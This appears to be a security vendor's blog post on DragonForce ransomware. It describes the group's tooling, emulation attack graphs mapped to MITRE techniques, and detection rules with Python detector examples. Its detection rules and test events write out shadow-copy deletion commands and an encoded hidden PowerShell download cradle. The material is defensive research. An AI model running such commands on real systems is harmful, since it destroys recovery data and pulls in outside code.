DragonForce is a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that emerged in August 2023. Originally identified as a pro-Palestine hacktivist operation, the group has since evolved into a hybrid adversary, blending political motives with a clear focus on financial extortion. Despite its ideological roots, the group increasingly prioritizes profit while continuing to target government organizations.

In its early stages, DragonForce payloads were based entirely on the leaked LockBit 3.0 (Black) builder. However, in July 2024, DragonForce operators introduced a customized variant based on the Conti V3 codebase. Its affiliate program, publicly launched on June 26, 2024, offers members up to 80% of ransom payments. The platform includes attack management tools, automation features, and a builder that allows customization of ransomware samples, including disabling targeted security features, configuring encryption parameters, and personalizing ransom notes.

In early 2025, DragonForce operators expanded their offerings by introducing a white-label ransomware service, allowing affiliates to rebrand the DragonForce payload under alternative names for an additional fee. This coincided with the announcement of the RansomBay service and portals, which serve as a data extortion platform hosting stolen information from victims compromised by the group or its affiliates.

DragonForce employs a double extortion strategy, exfiltrating sensitive information to its Dedicated Leak Site (DLS), which contains unique victim identifiers and leaked account details, in addition to encrypting it to increase the pressure on victims to comply with demands.

Operators leverage the Bring Your Own Vulnerable Driver (BYOVD) technique, particularly within its Conti-derived variant, to disable security controls and evade detection. Post-encryption, Windows Event Logs are cleared to hinder forensic analysis and cover traces of the intrusion.

DragonForce also integrates a suite of post-exploitation tools in its activities. These include SystemBC backdoor for maintaining access, Mimikatz for credential theft, SoftPerfect Network Scanner for mapping internal networks, and Cobalt Strike for lateral movement, ensuring ransomware deployment across multiple systems within the targeted environment.

AttackIQ has released two new attack graphs that emulate the Tactics, Techniques, and Procedures (TTPs) associated with the deployment of DragonForce ransomware to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new attack graphs in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with the DragonForce ransomware.
  • Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

DragonForce Ransomware – 2023-09 – From Public-Facing Remote Desktop Server to Domain-wide Ransomware Deployment

On September 25, 2024, Group-IB reported that in September 2023, their Digital Forensics and Incident Response (DFIR) team responded to an incident involving the deployment of DragonForce ransomware. This activity, which was initiated through the compromise of a public-facing web application server, involved the use of multiple post-exploitation tools prior to the deployment of DragonForce. These included SystemBC, also known as Coroxy, a backdoor employed to maintain access, Mimikatz for credential harvesting, SoftPerfect Network Scanner for internal network reconnaissance, and Cobalt Strike for lateral movement. Together, these tools facilitated the widespread deployment of DragonForce ransomware across numerous systems within the targeted environment.

Initial Access & Execution – Cobalt Strike Delivery and Deployment

This stage begins with the execution of an encoded PowerShell command designed to download and deploy a Cobalt Strike Beacon which, once operational, establishes persistence by creating a new service.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.

Create or Modify System Process: Windows Service (T1543.003): This scenario creates a service through the SC Windows utility.

Credential Access & Lateral Movement – Targeting Additional Systems

This stage begins with the deployment of SystemBC, also known as Coroxy, a backdoor that facilitates persistent access, enables network reconnaissance, and supports lateral movement. Once deployed, it establishes persistence by creating a Registry Run key configured to automatically execute a PowerShell command upon user logon or system boot.

Subsequently, AdFind is deployed to perform Active Directory reconnaissance. After this, system credentials are harvested through Mimikatz, which are then leveraged to perform lateral movement via Remote Desktop Protocol (RDP).

Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk, as two independent scenarios, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): This scenario creates an entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run to establish persistence on the system.

Remote System Discovery (T1018): This scenario leverages the AdFind utility to discover details about the Active Directory configuration including accounts, groups, computers, and subnets.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to remotely connect to an accessible system via Remote Desktop Protocol (RDP), a built-in remote access Windows utility.

The subsequent stages of the emulation correspond to those comprising the following microemulation of DragonForce ransomware.

[Malware Emulation] DragonForce Ransomware – 2025-05 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of DragonForce ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

The assessment template is based on behaviors reported by Cyble on April 24, 2024, Group-IB on September 25, 2024, and SentinelOne on May 2, 2025.

Initial Access & Execution – DragonForce Ransomware Deployment

This stage begins with the deployment of DragonForce ransomware, which, once operational, spawns a new process using the CreateProcessA API.

Ingress Tool Transfer (T1105): This scenario downloads the sample to memory and saves it to disk, as two independent scenarios, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Native API (T1106): This scenario executes the CreateProcessA Windows API call to create a new process of a given executable payload.

Discovery & Defense Evasion – System Reconnaissance and Security Control Evasion

This stage begins with reconnaissance of the environment by collecting general system information and enumerating active services. It then proceeds to deploy a driver, either Truesight.sys or RentDrv.sys, with the latter serving as a fallback if the primary driver fails to execute. Both drivers are leveraged as part of the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate EDR/XDR processes and evade detection.

System Information Discovery (T1082): This scenario executes RtlGetVersion and NetWkstaGetInfo Windows API calls to enumerate system information.

System Information Discovery (T1082): This scenario executes NtQuerySystemInformation API with the SystemModuleInformation argument to enumerate system modules.

System Service Discovery (T1007): This scenario executes the EnumServiceStatus Windows API to gather critical information about configured services.

System Service Discovery (T1007): This scenario executes the QueryServiceStatusEx and EnumDependentServices Windows API calls to retrieve information pertaining to a given service.

Impact – DragonForce Ransomware Encryption

This stage begins with the deletion of Volume Shadow Copies using a Windows Management Instrumentation (WMI) object. If that is prevented, it attempts the same deletion through the Windows Management Instrumentation Command-line (WMIC) utility.

Next, it enumerates available drives by invoking GetLogicalDrives, GetDriveTypeW, and DeviceIoControl, which are systematically traversed using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Finally, it encrypts the identified files using a combination of ChaCha8 and RSA-1024.

Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a Volume Shadow Copy created by the assessment template.

Inhibit System Recovery (T1490): This scenario executes the wmic.exe utility to delete a recent Volume Shadow Copy created by the assessment template.

System Information Discovery (T1082): This scenario executes the GetLogicalDrives Windows API call to retrieve the currently available disk drives.

System Information Discovery (T1082): This scenario executes the GetDriveTypeW Windows API call to retrieve information regarding the system’s physical drives.

System Information Discovery (T1082): This scenario executes the DeviceIoControl API with the IOCTL_STORAGE_QUERY_PROPERTY argument to retrieve system drive information, such as the serial number, to profile the target’s system.

File and Directory Discovery (T1083): This scenario will call the FindFirstFileW and FindNextFileW Windows API to perform the enumeration of the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by DragonForce ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at command line activity:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.

3. Data Encrypted for Impact (T1486):

Preventing systems and files from being encrypted should be a top priority. Ensuring that you have layered endpoint defenses including Antivirus and EDR solutions is critical.

3a. Detection

Ransomware attacks are best prevented and alerted on by your EDR/AV policies. Typically, a configuration option for ransomware protection is offered, and we strongly encourage enabling it in your security controls.

There are three telling signs of ransomware activity in an environment that you could query for and, if your security controls allow, turn into preventative detections: deletion of shadow volumes, suspicious amounts of exfiltrated data, and, of course, widespread file encryption.

Deletion of shadow volumes is usually the first step that occurs and can be detected by looking at command line activity:

Via vssadmin.exe:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")

Via PowerShell:

Process Name == powershell.exe
Command Line == "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}"
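The command-line signatures given in this section (the T1105 PowerShell download rule under 1a and the two T1490 shadow copy deletion rules under 2a and 3a) are written as matching logic in the following added example, which is not AttackIQ's code. The three rules are matched case-insensitively as substrings of a whitespace-normalised command line rather than as exact matches, so a command wrapped in `-Command "..."` still fires. Because the first stage of the attack graph runs an encoded PowerShell command, the matcher also decodes any `-EncodedCommand` argument (Base64 of UTF-16LE) before matching, so keywords hidden inside the encoding are still seen. The events are constructed Sysmon-style process-creation records, not real telemetry; host names and URLs are invented.

```python
"""Command-line signature matcher for the detection rules in this section.

Added example, not AttackIQ's code. Events are constructed; the rules
reproduce the page's T1105 and T1490 signatures as keyword groups.
"""
import base64
import binascii
import re
from dataclasses import dataclass

# Common spellings of the parameter; PowerShell accepts any unambiguous prefix.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Rule:
    name: str
    technique: str
    processes: frozenset   # image names (lower-case) the rule applies to
    all_of: list           # each inner list is a group; one alternative per group must appear


RULES = [
    Rule("PowerShell download cradle", "T1105", frozenset({"cmd.exe", "powershell.exe"}),
         [["iwr", "invoke-webrequest"], ["downloaddata"], ["hidden"]]),
    Rule("vssadmin shadow copy deletion", "T1490", frozenset({"cmd.exe", "powershell.exe"}),
         [["vssadmin"], ["delete shadows"]]),
    Rule("WMI shadow copy deletion", "T1490", frozenset({"powershell.exe"}),
         [["get-wmiobject win32_shadowcopy", "gwmi win32_shadowcopy"], ["$_.delete()"]]),
]


def expand_encoded(cmd: str) -> str:
    """Append the decoded text of any -EncodedCommand argument to the command line."""
    extra = []
    for b64 in ENCODED_ARG.findall(cmd):
        try:
            extra.append(base64.b64decode(b64, validate=True).decode("utf-16le"))
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a valid encoded command; match on the raw text only
    return " ".join([cmd, *extra])


def normalise(cmd: str) -> str:
    """Lower-case and collapse whitespace so substring rules are layout-independent."""
    return " ".join(expand_encoded(cmd).lower().split())


def match_rule(rule: Rule, event: dict) -> bool:
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in rule.processes:
        return False
    cmd = normalise(event["CommandLine"])
    return all(any(alt in cmd for alt in group) for group in rule.all_of)


def scan(events):
    """Return (host, technique, rule name) for every rule hit, in event order."""
    return [(ev["Host"], r.technique, r.name) for ev in events for r in RULES if match_rule(r, ev)]


def _encode(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build test input)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    # 1: download cradle whose keywords sit inside the encoded payload
    {"Host": "ws01", "Image": PS,
     "CommandLine": "powershell.exe -w Hidden -enc " + _encode(
         "$c = New-Object Net.WebClient; $c.DownloadData('http://example.invalid/a'); "
         "Invoke-WebRequest http://example.invalid/b")},
    # 2: shadow copy deletion through cmd.exe
    {"Host": "srv02", "Image": CMD, "CommandLine": "cmd.exe /c vssadmin delete shadows /all /quiet"},
    # 3: the WMI variant wrapped in -Command
    {"Host": "srv02", "Image": PS,
     "CommandLine": 'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}"'},
    # 4: benign WMI query, must not fire
    {"Host": "ws03", "Image": PS, "CommandLine": "powershell.exe -Command Get-WmiObject Win32_Service"},
    # 5: vssadmin.exe launched directly: outside the page's Process Name list, so not matched
    {"Host": "srv04", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Event 5 is included deliberately: the rules above restrict Process Name to cmd.exe and powershell.exe, so vssadmin.exe invoked directly (for example from a service or a dropped binary) is not matched by them as written. Adding vssadmin.exe to the process set of the T1490 rule closes that gap.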

Detecting suspicious Data Exfiltration:

Detecting exfiltration is well suited to IDS/IPS and DLP solutions. These products should be configured to identify sensitive files. If sensitive files, or a large amount of web traffic, are sent to a rare external IP, this should be detected or prevented depending on the security policies of the control. Historical NetFlow data logging can also bubble up hosts that are experiencing uncommon peaks in outgoing traffic.
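The NetFlow-based signal described above, an outbound peak from one host towards a rare external destination, is implemented in the following added example, which is not AttackIQ's code. A host alerts when its outbound volume to external addresses in an evaluated hour exceeds a multiple of its own mean over a set of baseline hours, and the alert carries any destinations that are contacted by only that host. The flow records are constructed; the spike factor, the baseline window and the "rare" threshold are assumed values that would be tuned per environment.

```python
"""Outbound-volume spike detection over NetFlow-style records.

Added example, not AttackIQ's code. Flow records are constructed tuples
of (host, destination IP, hour, bytes sent). Thresholds are assumptions.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import mean

# RFC 1918 plus loopback; anything else is treated as external for volume purposes
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip: str) -> bool:
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def hourly_outbound(flows):
    """host -> hour -> total bytes sent to external addresses."""
    totals = defaultdict(lambda: defaultdict(int))
    for host, dst, hour, nbytes in flows:
        if is_external(dst):
            totals[host][hour] += nbytes
    return totals


def rare_destinations(flows, max_hosts=1):
    """External destinations contacted by at most max_hosts distinct hosts."""
    seen = defaultdict(set)
    for host, dst, _hour, _nbytes in flows:
        if is_external(dst):
            seen[dst].add(host)
    return {dst for dst, hosts in seen.items() if len(hosts) <= max_hosts}


def detect_exfil(flows, baseline_hours, factor=5.0, max_hosts=1):
    """Alert (host, hour, bytes, rare destinations) when an evaluated hour's outbound
    volume exceeds factor x the host's mean over baseline_hours.  A host with no
    baseline traffic gets a threshold of 1 byte, so any outbound volume alerts."""
    totals = hourly_outbound(flows)
    rare = rare_destinations(flows, max_hosts)
    baseline = list(baseline_hours)
    alerts = []
    for host, per_hour in totals.items():
        threshold = max(mean(per_hour.get(h, 0) for h in baseline) * factor, 1)
        for hour in sorted(h for h in per_hour if h not in baseline):
            if per_hour[hour] > threshold:
                dsts = sorted({d for h, d, hr, _ in flows if h == host and hr == hour and d in rare})
                alerts.append((host, hour, per_hour[hour], dsts))
    return alerts


def _constructed_flows():
    flows = []
    for hour in range(7):
        flows.append(("ws01", "203.0.113.10", hour, 50_000))   # shared SaaS, seen from every host
        flows.append(("ws02", "203.0.113.10", hour, 40_000))
        flows.append(("ws02", "10.0.0.5", hour, 5_000_000))    # internal file server, ignored
    flows.append(("ws01", "198.51.100.7", 6, 900_000_000))     # 900 MB to a destination only ws01 talks to
    return flows


FLOWS = _constructed_flows()
BASELINE_HOURS = range(6)   # hours 0-5 form the baseline; hour 6 is evaluated

if __name__ == "__main__":
    for alert in detect_exfil(FLOWS, BASELINE_HOURS):
        print(alert)
```

The volume check and the rarity check are kept separate on purpose: a large transfer to a destination every host uses (a backup service, a CDN) is usually noise, while a large transfer to an address nobody else contacts is the case the paragraph above describes, and the rare-destination list on the alert is what an analyst would pivot on first.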

Detecting Ransomware-like File Encryption:

Utilizing an EDR or SIEM/SOAR product can help detect and prevent suspicious file encryption related to ransomware attacks. Using these tools to look for excessive file modifications (more than 1000 on a single system) within less than a minute is a good starting indicator.

To increase fidelity, you could additionally match the extensions of the modified files against popular ransomware extensions such as .conti, .Locky, .Ryuk, etc. If possible, with a SOAR or preventative EDR platform, we recommend configuring these detections to kill all processes involved in creating the alert, as that will most likely stop the spread of the ransomware.
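The file-modification heuristic from the two paragraphs above is implemented in the following added example, which is not AttackIQ's code: a per-host sliding window of 60 seconds alerts once the count of modifications reaches 1000, and the alert is raised to high fidelity when the files written carry one of the ransomware extensions named above. The events are constructed file-modification records (timestamp in milliseconds, host, process image, path); the process names are invented, and the "processes to terminate" list is returned for a SOAR playbook to act on rather than acted on here.

```python
"""Sliding-window detector for ransomware-like file modification bursts.

Added example, not AttackIQ's code. Events are constructed tuples of
(timestamp_ms, host, process, path). Thresholds follow the text above.
"""
from collections import defaultdict, deque
import os

RANSOMWARE_EXTENSIONS = {".conti", ".locky", ".ryuk"}   # the extensions listed above, lower-cased
WINDOW_MS = 60_000
THRESHOLD = 1000


def burst_alerts(events, window_ms=WINDOW_MS, threshold=THRESHOLD):
    """One alert per host, the first time its modification count in any window reaches threshold."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev[1]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort()                       # order by timestamp; telemetry rarely arrives sorted
        window = deque()
        for ev in evs:
            window.append(ev)
            while ev[0] - window[0][0] >= window_ms:   # drop events that fell out of the window
                window.popleft()
            if len(window) >= threshold:
                exts = {os.path.splitext(e[3])[1].lower() for e in window}
                alerts.append({
                    "host": host,
                    "start_ms": window[0][0],
                    "end_ms": ev[0],
                    "count": len(window),
                    "processes": sorted({e[2] for e in window}),
                    "fidelity": "high" if exts & RANSOMWARE_EXTENSIONS else "medium",
                })
                break                    # a SOAR would act on this alert; no need to keep counting
    return alerts


def processes_to_terminate(alerts):
    """Process names a SOAR playbook would kill, taken from high-fidelity alerts only."""
    return sorted({p for a in alerts if a["fidelity"] == "high" for p in a["processes"]})


def _constructed_events():
    evs = []
    # ws01: 1200 writes in 24 s, every file given a .locky extension -> high fidelity
    evs += [(1_000_000 + i * 20, "ws01", "suspect.exe",
             rf"C:\Users\a\Documents\doc{i}.docx.locky") for i in range(1200)]
    # srv02: 1500 writes spread over 10 min (150 per minute) by a backup job -> no alert
    evs += [(2_000_000 + i * 400, "srv02", "backup.exe",
             rf"D:\backup\set{i}.bak") for i in range(1500)]
    # ws03: exactly 1000 writes in 50 s with ordinary extensions -> medium fidelity
    evs += [(3_000_000 + i * 50, "ws03", "unknown.exe",
             rf"C:\Users\b\Desktop\sheet{i}.xlsx") for i in range(1000)]
    return evs


EVENTS = _constructed_events()

if __name__ == "__main__":
    found = burst_alerts(EVENTS)
    for alert in found:
        print(alert)
    print("terminate:", processes_to_terminate(found))
```

The srv02 case is the false positive the count threshold alone must not raise: a legitimate job touching many files over a long period never exceeds 1000 modifications inside any single minute. The ws03 case shows why the extension check is a fidelity booster and not a prerequisite: a burst with ordinary extensions still alerts, but at a level that warrants analyst review rather than automatic process termination.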

3b. Mitigation

MITRE ATT&CK Recommends the following mitigations:

Wrap-up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by DragonForce ransomware operators. With data generated from continuous testing and use of these assessment templates, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.